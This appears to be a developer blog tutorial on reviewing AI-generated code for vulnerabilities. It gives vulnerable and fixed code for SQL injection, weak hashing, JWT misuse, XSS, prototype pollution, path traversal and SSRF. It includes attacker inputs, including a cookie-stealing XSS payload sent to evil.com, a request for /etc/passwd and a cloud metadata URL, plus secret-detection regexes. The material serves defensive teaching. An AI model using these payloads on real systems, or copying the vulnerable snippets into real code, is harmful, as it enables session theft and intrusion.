DevBolt
By The DevBolt Team··14 min read

Vibe Coding Security: How to Review AI-Generated Code for Vulnerabilities

SecurityAIHowToCode Review

"Vibe coding" — using AI to generate entire features from natural language prompts — is how millions of developers ship code in 2026. But Veracode's 2025 State of Software Security report found that 45% of AI-generated code contains at least one vulnerability. Copilot, Cursor, Claude, and ChatGPT all produce code that compiles, passes tests, and ships with SQL injection, hardcoded secrets, or missing auth checks baked in. This guide walks through a practical, step-by-step security review process for any AI-generated code before it reaches production.

Want to scan code automatically? Paste your AI-generated code into DevBolt's AI Code Security Scanner for instant vulnerability detection — 25 rules across 10 categories, with CWE references and fix guidance. 100% client-side.

Why AI-Generated Code Is a Security Risk

AI models learn from millions of open-source repositories — including code with known vulnerabilities, outdated patterns, and insecure defaults. They optimize for "code that works," not "code that is secure." Common problems include:

  • 1.Hardcoded secrets — AI often generates placeholder API keys, database passwords, and JWT secrets directly in the code instead of reading from environment variables.
  • 2.Missing input validation — generated endpoints frequently accept and process user input without sanitization, creating injection vectors.
  • 3.Insecure defaults CORS: *, Math.random() for tokens, eval() for parsing, JWT without verification, HTTP instead of HTTPS.
  • 4.Overly complex logic — AI tends to produce deeply nested, high-complexity functions that are harder to review and more likely to hide bugs.
  • 5.Outdated patterns — models trained on older code may use deprecated APIs, weak cryptographic algorithms (MD5, SHA-1), or patterns that were acceptable years ago but are exploitable today.

Step 1: Scan for Known Vulnerability Patterns

Before reading the code manually, run it through an automated scanner. This catches the low-hanging fruit — hardcoded secrets, dangerous functions, and common anti-patterns — in seconds.

Use DevBolt's AI Code Security Scanner to paste your code and get an instant report. Here is what a typical AI-generated API handler looks like when scanned:

Vulnerable AI-generated code
// AI-generated Express endpoint
app.post("/api/users", async (req, res) => {
  const { email, password, role } = req.body;

  // Hardcoded secret (CWE-798)
  const API_KEY = "sk-proj-abc123def456";

  // SQL injection (CWE-89)
  const user = await db.query(
    `SELECT * FROM users WHERE email = '${email}'`
  );

  // Weak hashing (CWE-328)
  const hash = crypto.createHash("md5").update(password).digest("hex");

  // Missing auth check — anyone can set role to "admin"
  await db.query(
    `INSERT INTO users (email, password, role) VALUES ('${email}', '${hash}', '${role}')`
  );

  // Insecure token generation (CWE-330)
  const token = Math.random().toString(36).slice(2);

  res.json({ token });
});

A scanner would flag at least 5 issues here: the hardcoded API key, two SQL injection points, MD5 hashing for passwords, and Math.random() for token generation. Every one of these is a real vulnerability that AI assistants routinely produce.

Step 2: Check for Hardcoded Secrets and Credentials

This is the single most common vulnerability in AI-generated code. AI models frequently generate placeholder credentials that look real and get committed to repositories. Search for these patterns:

Patterns to search for
# API keys and tokens
/sk-[a-zA-Z0-9]{20,}/     # OpenAI-style keys
/AKIA[0-9A-Z]{16}/         # AWS access keys
/ghp_[a-zA-Z0-9]{36}/      # GitHub personal access tokens
/secret.*=.*["'][^"']+/i    # Generic secret assignments

# Database credentials
/mongodb(+srv)?://w+:w+@/  # MongoDB connection strings
/postgres://w+:w+@/         # PostgreSQL connection strings
/passwords*[:=]s*["'][^"']+/  # Password assignments

The fix: Replace every hardcoded credential with an environment variable. Use DevBolt's .env Validator to verify your .env file has no exposed secrets and matches your .env.example.

Before (insecure)
const JWT_SECRET = "super-secret-key-123";
const DB_URL = "postgres://admin:password@localhost/mydb";
After (secure)
const JWT_SECRET = process.env.JWT_SECRET;
if (!JWT_SECRET) throw new Error("JWT_SECRET not configured");

const DB_URL = process.env.DATABASE_URL;
if (!DB_URL) throw new Error("DATABASE_URL not configured");

Step 3: Validate All User Inputs

AI-generated code frequently trusts user input implicitly. Every value that comes from a request body, query parameter, URL path, or header must be validated before use. Look for:

  • Direct string interpolation in SQL queries (`${req.body.id}`)
  • eval() or new Function() with user input
  • innerHTML or dangerouslySetInnerHTML with unsanitized data
  • File paths constructed from user input (fs.readFile(req.params.file))
  • URLs built from user input passed to fetch() (SSRF)
Before (SQL injection)
// AI-generated — vulnerable to SQL injection
app.get("/api/users/:id", async (req, res) => {
  const user = await db.query(
    `SELECT * FROM users WHERE id = '${req.params.id}'`
  );
  res.json(user.rows[0]);
});
After (parameterized query)
// Secure — parameterized query prevents injection
app.get("/api/users/:id", async (req, res) => {
  const id = parseInt(req.params.id, 10);
  if (isNaN(id)) return res.status(400).json({ error: "Invalid ID" });

  const user = await db.query(
    "SELECT * FROM users WHERE id = $1",
    [id]
  );
  res.json(user.rows[0]);
});

Step 4: Review Authentication and Authorization

AI-generated auth code is notoriously fragile. Common issues include:

  • JWT without verification: code that decodes tokens using jwt.decode() instead of jwt.verify(), meaning anyone can forge tokens
  • Algorithm confusion: accepting alg: "none" or mixing HMAC/RSA algorithms, allowing signature bypass
  • Missing role checks: endpoints that authenticate the user but never verify they have permission for the specific action
  • Insecure cookies: session cookies missing httpOnly, secure, or sameSite attributes
Before (JWT decode without verify)
// AI-generated — decodes JWT without verifying signature!
const payload = jwt.decode(token);
if (payload.userId) {
  // Trusts unverified data — anyone can craft a fake token
  const user = await getUser(payload.userId);
}
After (proper JWT verification)
// Secure — verifies signature with explicit algorithm
try {
  const payload = jwt.verify(token, process.env.JWT_SECRET, {
    algorithms: ["HS256"],  // Explicit algorithm prevents confusion attacks
    maxAge: "1h",
  });
  const user = await getUser(payload.userId);
} catch (err) {
  return res.status(401).json({ error: "Invalid token" });
}

Use DevBolt's JWT Decoder to inspect token headers and payloads, and the JWT Builder to test signing with different algorithms.

Step 5: Check for Cross-Site Scripting (XSS)

AI-generated frontend code regularly uses innerHTML or dangerouslySetInnerHTML to render dynamic content. This creates XSS vulnerabilities where attackers can inject scripts:

Before (XSS via innerHTML)
// AI-generated React component — XSS vulnerability
function UserComment({ comment }) {
  return (
    <div dangerouslySetInnerHTML={{ __html: comment.body }} />
  );
}

// If comment.body contains: <img src=x onerror="document.location='https://evil.com?c='+document.cookie">
// The attacker steals the user's session cookie
After (safe rendering)
// Secure — render text content, not HTML
function UserComment({ comment }) {
  return <div>{comment.body}</div>;
}

// If you MUST render HTML, sanitize it first:
import DOMPurify from "dompurify";

function UserComment({ comment }) {
  const clean = DOMPurify.sanitize(comment.body);
  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}

Step 6: Audit Dependencies and Imports

AI models sometimes suggest packages that are deprecated, unmaintained, or have known vulnerabilities. When AI generates an npm install or import statement, verify:

  • The package exists and is actively maintained (check npm weekly downloads and last publish date)
  • Run npm audit after installing to check for known vulnerabilities
  • The package name is correct — AI sometimes hallucinates package names that don't exist, and typosquatters register malicious packages with similar names
  • Consider whether you need the dependency at all — AI tends to import heavy libraries for tasks achievable with built-in APIs
Common AI dependency mistakes
# AI suggests deprecated crypto library
npm install crypto  # ❌ Use built-in Node.js crypto module

# AI suggests request (deprecated since 2020)
npm install request  # ❌ Use fetch() (built into Node 18+)

# AI hallucinates a package name
npm install express-validator-plus  # ❌ Package doesn't exist
npm install express-validator       # ✓ The real package

Step 7: Test Error Handling for Information Leakage

AI-generated error handling frequently leaks internal details — stack traces, database schemas, file paths, and environment information — that help attackers map your application.

Before (information leakage)
app.use((err, req, res, next) => {
  // AI-generated error handler leaks everything
  console.log("Error:", err);
  res.status(500).json({
    error: err.message,
    stack: err.stack,         // Leaks internal file paths
    query: err.sql,           // Leaks database query
    config: app.get("config") // Leaks server configuration
  });
});
After (safe error handling)
app.use((err, req, res, next) => {
  // Log full error internally for debugging
  console.error("Internal error:", err);

  // Return generic message to client
  res.status(500).json({
    error: "An internal error occurred",
    requestId: req.id,  // Correlate with server logs
  });
});

Step 8: Measure Code Complexity

AI-generated code often has high cyclomatic and cognitive complexity — deeply nested conditionals, long functions, and convoluted logic. High complexity is a leading indicator of bugs, including security bugs. Functions with cyclomatic complexity above 10 are statistically more likely to contain defects.

Paste your AI-generated code into DevBolt's Code Complexity Analyzer to get per-function metrics. Focus on functions flagged as "High" or "Very High" risk — these are the ones most likely to hide bugs and should be refactored before shipping.

Target these thresholds per function:

  • Cyclomatic complexity: keep under 10. Above 20 means refactor immediately.
  • Cognitive complexity: keep under 15. Above 25 means the function is too hard to review reliably.
  • Nesting depth: keep under 4 levels. Use guard clauses and early returns to flatten.

The Vibe Coding Security Checklist

Run through this checklist every time you ship AI-generated code:

CheckWhat to Look ForTool
SecretsAPI keys, passwords, tokens in sourceSecurity Scanner
InjectionSQL, NoSQL, command, LDAP injectionSecurity Scanner
XSSinnerHTML, dangerouslySetInnerHTMLSecurity Scanner
AuthJWT verify, role checks, cookie flagsJWT Decoder
ComplexityCC > 10, nesting > 4, long functionsComplexity Analyzer
Dependenciesnpm audit, deprecated packagesnpm CLI
Error handlingStack traces, SQL queries in responsesManual review
Env config.env structure, missing vars.env Validator

How to Prompt AI for More Secure Code

You can significantly reduce the number of vulnerabilities in AI-generated code by being explicit about security requirements in your prompts. Instead of:

Vague prompt (produces insecure code)
"Write an Express endpoint to create a user"

Use a structured prompt with explicit security constraints:

Security-aware prompt
"Write an Express POST endpoint to create a user.
Requirements:
- Use parameterized queries (no string interpolation in SQL)
- Read secrets from environment variables only
- Validate all inputs with express-validator
- Hash passwords with bcrypt (cost factor 12+)
- Return generic error messages (no stack traces)
- Set httpOnly, secure, sameSite cookies
- Rate limit to 5 requests per minute per IP
- Use TypeScript with strict mode"

DevBolt's AI Prompt Template Builder has pre-built templates for code review and security-focused prompts that you can customize for your use case.

Real-World Vulnerabilities Found in AI Code

These are actual vulnerability patterns that security researchers have found in AI-generated code across popular assistants:

1. Prototype Pollution

AI-generated object merge — prototype pollution
// AI often generates recursive merge functions like this:
function deepMerge(target, source) {
  for (const key in source) {
    if (typeof source[key] === "object" && source[key] !== null) {
      target[key] = target[key] || {};
      deepMerge(target[key], source[key]);
    } else {
      target[key] = source[key];  // No __proto__ check!
    }
  }
  return target;
}

// Attacker sends: { "__proto__": { "isAdmin": true } }
// Now EVERY object in the app has isAdmin === true
Fixed version
function deepMerge(target, source) {
  for (const key of Object.keys(source)) {
    // Block prototype pollution
    if (key === "__proto__" || key === "constructor" || key === "prototype") {
      continue;
    }
    if (typeof source[key] === "object" && source[key] !== null) {
      target[key] = target[key] || {};
      deepMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

2. Path Traversal

AI-generated file server — path traversal
// AI-generated static file handler
app.get("/files/:name", (req, res) => {
  const filePath = path.join(__dirname, "uploads", req.params.name);
  res.sendFile(filePath);
});

// Attacker requests: GET /files/../../etc/passwd
// Server sends the system password file
Fixed version
app.get("/files/:name", (req, res) => {
  const safeName = path.basename(req.params.name); // Strip directory traversal
  const filePath = path.join(__dirname, "uploads", safeName);

  // Extra safety: verify the resolved path is still inside uploads/
  if (!filePath.startsWith(path.join(__dirname, "uploads"))) {
    return res.status(403).json({ error: "Access denied" });
  }

  res.sendFile(filePath);
});

3. SSRF (Server-Side Request Forgery)

AI-generated URL fetcher — SSRF vulnerability
// AI-generated webhook handler
app.post("/api/webhook", async (req, res) => {
  const { callbackUrl } = req.body;

  // Fetches ANY URL the user provides — including internal services!
  const response = await fetch(callbackUrl);
  const data = await response.json();

  res.json(data);
});

// Attacker sends: { "callbackUrl": "http://169.254.169.254/latest/meta-data/" }
// Server responds with AWS instance credentials
Fixed version
import { URL } from "url";

const ALLOWED_HOSTS = ["api.example.com", "hooks.slack.com"];

app.post("/api/webhook", async (req, res) => {
  const { callbackUrl } = req.body;

  try {
    const parsed = new URL(callbackUrl);

    // Block internal IPs and restrict to HTTPS
    if (parsed.protocol !== "https:") {
      return res.status(400).json({ error: "HTTPS required" });
    }
    if (!ALLOWED_HOSTS.includes(parsed.hostname)) {
      return res.status(400).json({ error: "Host not allowed" });
    }

    const response = await fetch(callbackUrl);
    const data = await response.json();
    res.json(data);
  } catch {
    res.status(400).json({ error: "Invalid URL" });
  }
});

Ship Fast, but Ship Safe

Vibe coding is not going away — it makes developers faster, and the tools keep improving. The solution is not to stop using AI for code generation, but to build a security review habit into your workflow. Scan every AI-generated function before committing. Check for secrets, injection, auth flaws, and complexity. Use structured prompts that include security requirements.

The entire review process takes 5 minutes per feature. That is 5 minutes between "AI wrote my code" and "my code is in production with a SQL injection vulnerability."

Deploying AI-generated code to production?

DigitalOcean App Platform auto-deploys from Git with built-in container security scanning, environment variable management, and DDoS protection — so your infrastructure is secure even if your code needs work. Start free, scale when ready.

Share:
DB

Written by the DevBolt Team

DevBolt is a collection of 117+ free developer tools that run entirely in your browser — no data ever leaves your device. Built and maintained by AI agents, reviewed by humans. Learn more about DevBolt